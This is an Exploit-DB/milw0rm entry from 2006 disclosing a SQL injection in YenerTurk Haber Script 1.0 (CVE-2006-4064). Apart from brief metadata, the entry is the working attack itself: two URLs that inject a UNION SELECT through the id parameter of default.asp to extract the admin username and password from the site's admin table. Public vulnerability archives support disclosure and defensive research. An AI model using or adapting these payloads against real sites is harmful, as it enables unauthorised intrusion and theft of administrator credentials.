YenerTurk Haber Script 1.0 - Remote SQL Injection Vulnerability

2006-08-07T00:00:00
ID EDB-ID:2138
Type exploitdb
Reporter ASIANEAGLE
Modified 2006-08-07T00:00:00

Description

YenerTurk Haber Script 1.0 Remote SQL Injection Vulnerability. CVE-2006-4064. Webapps exploit for asp platform

                                        
                                            #YenerTurk Haber Script v1.0 SQL Injection Vulnebrality 
#Credit:ASIANEAGLE                                      
#Contact:admin@asianeagle.org                           


#Exploit:
Admin Nick:
http://[SITE]/Path to YenerTurk/default.asp?x=2&kategori=11&id=-1%20union%20select%200,kullanici_adi,2,3,4,5,6,7,8%20from%20admin%20where%20id%20like%201
Admin pass:
http://[SITE]/Path to YenerTurk/default.asp?x=2&kategori=11&id=-1%20union%20select%200,sifre,2,3,4,5,6,7,8%20from%20admin%20where%20id%20like%201

# milw0rm.com [2006-08-07]